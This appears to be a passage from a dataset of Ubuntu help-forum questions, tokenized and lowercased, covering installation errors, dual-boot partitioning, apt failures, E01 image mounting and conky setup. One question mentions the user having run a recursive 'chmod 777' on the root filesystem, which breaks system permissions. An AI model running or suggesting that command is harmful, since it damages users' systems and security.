device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 09da : c10a a4 tech co. , ltd bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
385373	i get error during the installation	when i get to the middle of the installation - when it says downloading packages.. after that another program called gpo or gpag i do n't remember it ... its says cant install this and installation ca n't reboot without this.. i download ubuntu 12.04.3 64 bit ... i retry it several times.. but still get this error ... what to do ? should i change to 32 bit ? or should i download ubuntu 13 ? please help i have 4gb ram intel i3 500 gb hdd
385375	how do mount *.e01 image file on ubuntu system ?	here i would like to mount *.e01 file system on my mounting point say /media/er01 . right now with help of ewfmount command but it not working at all.. error code that i got while executing mmm @ mmm : /media $ sudo ewfmount /media/sda1/4gb_e01/4gb_e01.e01 /media/er01/ sudo : unable to resolve host mmm ewfmount 20130416 mmm @ mmm : /media $ ls -lat ls : can not access er01 : permission denied total 60 drwxr-xr-x 29 root root 4096 dec 3 16:32 0456d39e-f328-44c7-b3f3-f488d8e7de42 drwxr-xr-x 29 root root 4096 dec 3 16:32 sda1 drwxr-xr-x 16 root root 4096 dec 3 10:18 . drwxr-xr-x 10 root root 4096 dec 2 17:53 sdb4 drwx -- -- -- 1 tech tech 4096 dec 2 17:13 pendrive drwxr-xr-x 25 root root 4096 nov 30 20:55 .. drwxr-xr-x 2 root root 4096 nov 30 15:32 sr1 drwxr-xr-x 2 root root 4096 nov 30 14:26 sr0 drwxr-xr-x 2 root root 4096 nov 18 15:22 sdh1 drwxr-xr-x 2 root root 4096 nov 18 10:28 sdg drwxr-xr-x 2 root root 4096 nov 16 11:25 sdc1 drwxr-xr-x 2 root root 4096 oct 23 14:21 sdb5 drwxr-xr-x 2 root root 4096 aug 17 15:10 sdb3 drwxr-xr-x 2 root root 4096 jul 30 18:13 sda5 drwxr-xr-x 4 root root 4096 jul 30 17:22 sdb1 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? er01
385376	should i defragment my hard disk before installing using wubi ?	is it advisable to defragment my hard disk before using wubi ? is there any other precautions that i should take before using wubi ? my os is windows xp-32 bit .
385379	ls command very slow after deletion of thousand files on a directory	i have a dir under /home/myuser dir which an application stores and deletes millions of temporary files . when i do ls on this dir ( now it only has a hundred files only ) it is too slow ( actually i do not get any output for many minutes ) . after some google search and doing : ls -dl ~/mydir/ i get this drwxrwxrwx 2 myuser myuser 160108544 oct 12 11:31 /home/myuser/mydir/ which basically means i have to re-index directory entries for this directory ( if i understood correctly ) . how do i do force such a re-indexing on this dir ?
385380	how to expand the privileged port range past 1024 ?	port numbers under 1024 are reserved for superuser , so a normal user can not bind to ports in the range . and a range of ports that the system will assign random bind requests from can be set in /proc/sys/net/ipv4/ip_local_port_range so i can reserve a range from automatic allocation . but how do i deny access to non-privileged users to a range of ports ? for example i would like to have ports 16000-17000 to be only usable by superuser . or just increasing the standard 0-1024 to 0-17000 or some arbitrary number i choose . how can i accomplish this ?
385383	does ubuntu install your pc drivers automatically ?	does ubuntu install your pc drivers automatically ? and does it need to be updated like windows update ?
385388	usb ports did not work on win7 after rebooting from ububuntu 13.04	most of time i am working in ubuntu 13.04 , but sometimes i need use win7 . the problem is when i loads into win7 only one of my five usb-ports is working . i need to reinstall drivers to make them working how i can fix it ?
385391	commit error is already locked via '/opt/lampp/htdocs/project	when i am committing from rapid svn in xubuntu its show below error error : error while performing action : commit failed ( details follow ) : '/opt/lampp/htdocs/project/skin/frontend/default/default/images ' is already locked via '/opt/lampp/htdocs/project ' . how can i solve above error
385393	how to add shortcuts to top pannel	i want to add shortcuts to top pannel in ubuntu 13.10 also want to know how to login as root user becausemts wifi connection work only in root user . how can enable the wifi mobile internet in ubuntu 13.10
385397	i have trouble finding the url and drivers for my hp network printer	i want to find the hp printer that shares my wifi router , also another linux machine on the same network
385398	`` sub-process gzip returned an error code ( 1 ) '' , how to fix ?	when i try , ali @ ali-office : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : update-notifier : depends : update-notifier-common ( = 0.147 ) but 0.147.1 is installed e : unmet dependencies . try using -f. and i trying ali @ ali-office : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : update-notifier the following packages will be upgraded : update-notifier 1 upgraded , 0 newly installed , 0 to remove and 14 not upgraded . 4 not fully installed or removed . need to get 0 b/56,0 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y e : sub-process gzip returned an error code ( 1 ) e : prior errors apply to /var/cache/apt/archives/update-notifier_0.147.1_amd64.deb debconf : apt-extracttemplates failed : no such file or directory dpkg : unrecoverable fatal error , aborting : reading files list for package 'libgcc1 : amd64 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ali @ ali-office : ~ $ how i solve this problem ?
385402	lenovo ideapad s210	`` try without install '' on 13.10 gives me a wonderful experience with the touchscreen ( much better than windows8 ) but the mousepad and keyboard do n't work ! ! ! how can i fix this ? i do n't want to install until i 'm sure everything is going to work . another question : when going forward to the install program , it does n't recognize windows8 on it , it says there are no os on the machine . that does n't scare me so much , i 'm planning to create a separate partition using win8 and then just install on that , but want to ask : anyone with more experience/knowledge on this thinks this might work , or is it a completely wrong idea ?
385403	bluetooth adaptor functions only on either of the operating system	bluetooth adapter functions only on either of the operating system not on both with multi-booting of ubuntu13.10 and windows 7 and interestingly wifi is working well on both os my machine is toshiba satellite-c640
385405	partitioning hard drive with windows 7 for ubuntu installation	i have an asus k53u laptop with windows 7 64-bit installed . i want it to dual-boot with ubuntu ( linux-secure-remix , preferably ) . i have previously used wubi on this laptop . currently my partitions are arranged like this : recovery size : 25gb filesystem : ? ? ? used : ? ? ? free : ? ? ? os size : 300gb filesystem : ntfs used : 70.4gb free : 229gb data size : 373gb filesystem : ntfs used : 206gb free : 166gb total : 698gb i do not want to touch the recovery partition , for obvious reasons . the os partition has windows installed on it . the data partition has files . firstly , is it worth installing ubuntu to its own partition instead of using wubi ? secondly , how would i partition the disk if i wanted to install linux-secure-remix , without touching recovery and without removing windows ? thank you in advance !
385407	opening var/www with windows from ubuntu server	i have apache2 installed on a ubuntu12.04 workstation and in the var/www folder is an index.html . now i am connected with a win7 workstation via hotspot to ubuntu . i can ping from one to the other and i can connect to the internet from win7 via ubuntu . how can i open the website in var/www from win7 ? what is the best way to get access to apache2 from other devices like smartphones ?
385408	problem installing gimp on 12.04	get following error while trying to install gimp 2.8 on ubuntu 12.04 : the following packages have unmet dependencies : gimp : depends : libgimp2.0 ( < = 2.6.12-z ) but 2.8.6-0precise1~ppa is to be installed depends : gimp-data ( < = 2.6.12-z ) but 2.8.6-0precise1~ppa is to be installed how do i update those dependencies ?
385409	where are my kernels ?	i tried the other day to install ubuntu on my laptop ( hp nx6110 ) , but it gives me a warning message that says 'i do not have the right kernels ' . how do i get these kernels ? also i was able to get ubuntu 9 to run on it . the laptop previously had windows xp installed .
385410	custom webapp not appearing in unity launcher	i created a custom webapp in order to have it in the unity launcher . the thing is that i followed some instructions found on the web and i can actually search for it in the dash . i click on it and it opens firefox and it goes to the proper destination . so , that 's good . now , what i want is for the webapp to appear in the launcher when it is launched from the dash so that i can right-click on it and select `` lock to launcher '' , but that does not happen . i know this question has been asked already ( custom unity web app not appearing in the launcher ) but it did not get a single reply . does anybody know how to make the webapp visible in the launcher ? thanks in advance !
385412	ubuntu uefi windows 8.1 dual boot	i have installed win8 and ubuntu side by side before in the past and had issues with booting which were fixed perfectly the first time using boot-repair . this time , i installed win8.1 and ubuntu with the same issue . boot-repair also fixed it . after running windows a few times , i attempted to reboot and got the following : error : unknown filesystem grub rescue > i was able to find the windows uefi boot file doing a boot options from the bios and successfully boot win8 from : ms/boot/bootmgrfw.efi . when i booted into unbuntu live from a usb and reinstalled and re-ran boot-repair , it was much more involved and asked me to open a couple of terminal windows and paste in some additional commands . at the end running , it said everything was good but i still have the same issues . it appears it made backup copies of my uefi boot files because now i need to boot bkpbootmgrfw.efi to successfully load win8.1 while bootmgrfw.efi gives the same unknown filesystem error . the url i got after running boot-repair the second time is http : //paste.ubuntu.com/6514148/ is there a way to manually fix the uefi boot or should i blow away ubuntu , repair windows and then reinstall ubuntu ? update : i can boot \efi\ubuntu\grub64.efi and get to the normal grub boot menu which i can load either win8 or ubuntu . it also shows the boot file for win8 to be the backup file .
385415	cd creator/burner has frozen	i was burning something on to a blank cd . now at the top it says `` 100 % done '' , but well i do n't know ? it shows the downloading status at like 1/4 , but it 's been like this for hours . under that it says `` creating image checksum '' . any ideas what 's up ?
385416	pg_ctl : command not found , what package has this command ?	i have installed pgadmin using the ubuntu software center and am trying to access a local database ( recently downloaded from the internet ) . i have tried to run the pg_ctl command ( running as postgres ) however this gives a command not found error . i have also ran the following commands : echo $ path : /usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games so that 's a bit of a weird place but still . whereis pg_ctl : pg_ctl : /usr/share/man/man1/pg_ctl.1.gz type pg_ctl : -su : so it 's somewhere on my system type : pg_ctl : not found which looks wrong apt-cache policy postgres-xc gives me a no such file or directory error the output of sudo apt-get install postgres-xc is reading package lists ... done building dependency tree reading state information ... done e : unable to locate package postgres-xc sudo apt-get -q update gives me : get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:2 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:3 http : //security.ubuntu.com precise-security/main sources [ 93.6 kb ] hit http : //nl.archive.ubuntu.com precise release.gpg hit http : //nl.archive.ubuntu.com precise-updates release.gpg hit http : //nl.archive.ubuntu.com precise-backports release.gpg hit http : //nl.archive.ubuntu.com precise release hit http : //nl.archive.ubuntu.com precise-updates release get:4 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //nl.archive.ubuntu.com precise-backports release hit http : //extras.ubuntu.com precise release hit http : //nl.archive.ubuntu.com precise/main sources hit http : //nl.archive.ubuntu.com precise/restricted sources hit http : //nl.archive.ubuntu.com precise/universe sources hit http : //nl.archive.ubuntu.com precise/multiverse sources hit http : //nl.archive.ubuntu.com precise/main amd64 packages hit http : //nl.archive.ubuntu.com precise/restricted amd64 packages hit http : //nl.archive.ubuntu.com precise/universe amd64 packages hit http : //nl.archive.ubuntu.com precise/multiverse amd64 packages hit http : //nl.archive.ubuntu.com precise/main i386 packages hit http : //nl.archive.ubuntu.com precise/restricted i386 packages hit http : //nl.archive.ubuntu.com precise/universe i386 packages hit http : //nl.archive.ubuntu.com precise/multiverse i386 packages hit http : //nl.archive.ubuntu.com precise/main translationindex hit http : //nl.archive.ubuntu.com precise/multiverse translationindex hit http : //nl.archive.ubuntu.com precise/restricted translationindex hit http : //extras.ubuntu.com precise/main sources hit http : //nl.archive.ubuntu.com precise/universe translationindex hit http : //nl.archive.ubuntu.com precise-updates/main sources hit http : //nl.archive.ubuntu.com precise-updates/restricted sources hit http : //nl.archive.ubuntu.com precise-updates/universe sources hit http : //nl.archive.ubuntu.com precise-updates/multiverse sources hit http : //nl.archive.ubuntu.com precise-updates/main amd64 packages hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //nl.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //nl.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //nl.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //nl.archive.ubuntu.com precise-updates/main i386 packages hit http : //nl.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //nl.archive.ubuntu.com precise-updates/universe i386 packages hit http : //nl.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //nl.archive.ubuntu.com precise-updates/main translationindex hit http : //nl.archive.ubuntu.com precise-updates/multiverse translationindex get:5 http : //security.ubuntu.com precise-security/restricted sources [ 2,494 b ] get:6 http : //security.ubuntu.com precise-security/universe sources [ 29.9 kb ] hit http : //nl.archive.ubuntu.com precise-updates/restricted translationindex hit http : //nl.archive.ubuntu.com precise-updates/universe translationindex hit http : //nl.archive.ubuntu.com precise-backports/main sources hit http : //nl.archive.ubuntu.com precise-backports/restricted sources hit http : //nl.archive.ubuntu.com precise-backports/universe sources hit http : //nl.archive.ubuntu.com precise-backports/multiverse sources hit http : //nl.archive.ubuntu.com precise-backports/main amd64 packages hit http : //nl.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //nl.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //nl.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //nl.archive.ubuntu.com precise-backports/main i386 packages hit http : //nl.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //nl.archive.ubuntu.com precise-backports/universe i386 packages hit http : //nl.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //nl.archive.ubuntu.com precise-backports/main translationindex hit http : //nl.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //nl.archive.ubuntu.com precise-backports/restricted translationindex hit http : //nl.archive.ubuntu.com precise-backports/universe translationindex hit http : //nl.archive.ubuntu.com precise/main translation-en hit http : //nl.archive.ubuntu.com precise/multiverse translation-en hit http : //nl.archive.ubuntu.com precise/restricted translation-en hit http : //nl.archive.ubuntu.com precise/universe translation-en hit http : //nl.archive.ubuntu.com precise-updates/main translation-en get:7 http : //security.ubuntu.com precise-security/multiverse sources [ 1,797 b ] get:8 http : //security.ubuntu.com precise-security/main amd64 packages [ 347 kb ] hit http : //nl.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //nl.archive.ubuntu.com precise-updates/restricted translation-en hit http : //nl.archive.ubuntu.com precise-updates/universe translation-en hit http : //nl.archive.ubuntu.com precise-backports/main translation-en hit http : //nl.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //nl.archive.ubuntu.com precise-backports/restricted translation-en hit http : //nl.archive.ubuntu.com precise-backports/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en get:9 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 4,627 b ] get:10 http : //security.ubuntu.com precise-security/universe amd64 packages [ 85.4 kb ] get:11 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2,439 b ] get:12 http : //security.ubuntu.com precise-security/main i386 packages [ 366 kb ] get:13 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:14 http : //security.ubuntu.com precise-security/universe i386 packages [ 89.5 kb ] get:15 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,635 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en fetched 1,081 kb in 0s ( 1,561 kb/s ) cat /etc/apt/sources.list gives me : # deb cdrom : [ ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise universe deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //nl.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main
385417	what is the right kernel to have to install ubuntu in a vm ?	i am a new ubuntu user . i created a vm for ubuntu and downloaded the ubuntu 13.10 iso file , started the vm and it started to boot , but an error message appeared saying that i did n't have the right kernel to start the installation process . so how can i find out which kernel i need to have to start the installation process ?
385419	issue with busybox	i just put ubuntu , the latest version on my new pc ( dont have partitions , dont have windows ) . and it was everything good , until last night , when i started it and ubuntu is not very stable , and im not able to turn it of or restart it , so i have to switch off , and when i restart and go into recuperation mode , it comes to this : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . when i enter 'help ' it comes : ( initramfs ) help built-in commands : [ alias break cd chdir command continue echo eval exec exit export false getopts hash help let local printf pwd read readonly return set shift test times trap true type ulimit umask unalias unset wait [ [ [ ash awk basename blockdev cat chmod chroot chvt clear cmp cp cut deallocvt df dnsdomainname du dumpkmap echo egrep env expr false fbset fdflush fgrep find grep gunzip gzip hostname ifconfig ip kill ln loadfont loadkmaps ls mkdir mkfifo mknod mkswap mktemp modinfo more mount mv openvt pidof printf ps pwd readlink reset rm rmdir sed seq setkeys sh sleep sort stat static-sh stty switch_root sync tail tee test touch tr true tty umont uname uniq wc wget which yes zcat and after just stays there and nothing i can do . if anyone can help . thanks
385422	how can i unistall fern wifi cracker ?	i installed fern ( with all its dependencies ) with the following command on the terminal : sudo dpkg -i fern-wifi-cracker_1.6_all.deb and i used this to launch it in a terminal : sudo python '/home/user/downloads/fern-wifi-cracker/execute.py' now i want to completely uninstall it . i have already remove it from the ubuntu software center ( along with the aircracker-ng ) and i have already use the below commands in the terminal : sudo apt-get purge fern-wifi-cracker sudo apt-get remove fern-wifi-cracker ... but i still have this folder i can not delete : /home/user/downloads/fern-wifi-cracker how do i completely uninstall fern wifi cracker ?
385426	what are the types and prices of licences available ?	what are the types of licence that we can get for the ubuntu server and if any of the editions costs money how much would that be around ?
385432	12.04.03 installation error	when trying to install 12.04 from usb , erasing a corrupt version of 10.04 ( i had run chmod 777 -r / on it with root access ) , i get the following error : kernel panic - not syncing : attempted to kill init ! i have windows 7 installed on my system too , and i do n't want the data on it to be lost .
385435	how to extract .snappy format file in ubuntu ?	i executed the compression method program in hadoop by using snappycodec method.the output has came in .snappy format.can anyone help me , how to extract .snappy format file in hadoop ?
385437	configure oracle instant client to use tnsnames in ubuntu	trying to get oracle net connections working on ubuntu 13.10 64bit using this strategy as a basis i got all this to work perfectly . i can connect to a remote database using sqlplus uid/pwd @ server : port/tnsservicename what that link does not provide is how to set up tnsnames to work with the instant client . there are a bunch of other postings ( including one from oracle itself ) that describe how to do this . basically , you just need to create the /network/admin directory within the $ oracle_home directory , create the tnsnames.ora and sqlnet.ora files and edit them . $ tns_admin also needs to be set i 've done all this but not getting any sort of response using tnsnames . the error is always : ora-12154 : tns : could not resolve the connect identifier specified obviously tools like tnsping are not provided with the instant client so troubleshooting that way is not possible . also , i added trace options to sqlnet.ora , but -as expected- sqlnet.ora is not found either . can anyone help ?
385441	install ubuntu 13.10 alongside rhel 6.4	i have installed rhel 6.4 on my laptop , and now i want to install and dual boot ubuntu alongside rhel . i have installed rhel as lvm ( boot as primary and root swap & home in logical ) . i have also given below the details of my drives . i have made sda5 the root partition for ubuntu and kept boot and swap common . after installation i can not see ubuntu in grub . can someone please help me with installing ubuntu as dual boot ? ====================== fdisk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd4364e8e device boot start end blocks id system /dev/sda1 * 2048 1026047 512000 83 linux /dev/sda2 1026048 205826047 102400000 8e linux lvm /dev/sda3 205828094 405826142 99999024+ 5 extended /dev/sda5 205828096 405826142 99999023+ 83 linux disk /dev/mapper/rajani-root : 31.5 gb , 31474057216 bytes 255 heads , 63 sectors/track , 3826 cylinders , total 61472768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/rajani-swap : 8589 mb , 8589934592 bytes 255 heads , 63 sectors/track , 1044 cylinders , total 16777216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/rajani-home : 21.0 gb , 20971520000 bytes 255 heads , 63 sectors/track , 2549 cylinders , total 40960000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000
385446	positioning conky and deleting the black background of conky	i really like the look conky should give to my desktop , but it seems to fail to work properly . conky 's window is not transparent , but black . it also is positioned in the top_left position . i want it to be in the middle_middle of my screen . # conky settings # background yes update_interval 1 double_buffer yes no_buffers yes # window specifications # gap_x 0 gap_y 0 minimum_size 600 0 maximum_width 711 own_window yes own_window_type dock own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below # own_window_argb_visual yes # own_window_argb_value 0 # border_margin 0 # border_inner_margin 0 # border_outer_margin 0 # alignment middle_middle # graphics settings # draw_shades no draw_outline no draw_borders no draw_graph_borders no # text settings # use_xft yes xftalpha 0 xftfont open sans light : size=10 override_utf8_locale yes imlib_cache_size 0 # color scheme # default_color ffffff color1 ffffff color2 ffffff color3 ffffff color4 ffffff color5 ffffff color6 ffffff color7 333333 text $ { execi 300 curl -s `` http : //weather.yahooapis.com/forecastrss ? w=733881 & u=c '' -o ~/.cache/weather.xml } $ { font raleway : weight=light : size=100 } $ { voffset -40 } $ { alignc } $ { time % h } $ { alignc } : $ { alignc } $ { time % m } $ { font raleway : weight=light : size=32 } $ { voffset -40 } $ { alignc } $ { time % a % b % d } $ { font raleway : size=20 } $ { voffset -64 } $ { alignc 216 } $ { execi 300 grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` temp=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } ° $ { font raleway : weight=light : size=14 } $ { voffset -52 } $ { alignc 122 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } ° $ { voffset -19 } $ { alignc 12 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } ° $ { voffset -19 } $ { alignc -98 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==4 ' } ° $ { voffset -19 } $ { alignc -208 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==5 ' } ° $ { font raleway : weight=light : size=10 } $ { voffset -10 } $ { alignc 98 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } ° $ { voffset -14 } $ { alignc -12 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } ° $ { voffset -14 } $ { alignc -122 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==4 ' } ° $ { voffset -14 } $ { alignc -232 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==5 ' } ° $ { font raleway : weight=light : size=14 } $ { voffset -26 } $ { alignc 220 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { voffset -18 } $ { alignc 110 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { voffset -19 } $ { alignc } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { voffset -18 } $ { alignc -110 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==4 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { voffset -19 } $ { alignc -220 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==5 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { font raleway : weight=light : size=14 } $ { execi 300 cp -f ~/.conky-weather-icons/ $ ( grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' ) .png ~/.cache/weather-1.png } $ { image ~/.cache/weather-1.png -p 61,320 -s 32x32 } $ { execi 300 cp -f ~/.conky-weather-icons/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' ) .png ~/.cache/weather-2.png } $ { image ~/.cache/weather-2.png -p 171,320 -s 32x32 } $ { execi 300 cp -f ~/.conky-weather-icons/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' ) .png ~/.cache/weather-3.png } $ { image ~/.cache/weather-3.png -p 281,320 -s 32x32 } $ { execi 300 cp -f ~/.conky-weather-icons/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==4 ' ) .png ~/.cache/weather-4.png } $ { image ~/.cache/weather-4.png -p 391,320 -s 32x32 } $ { execi 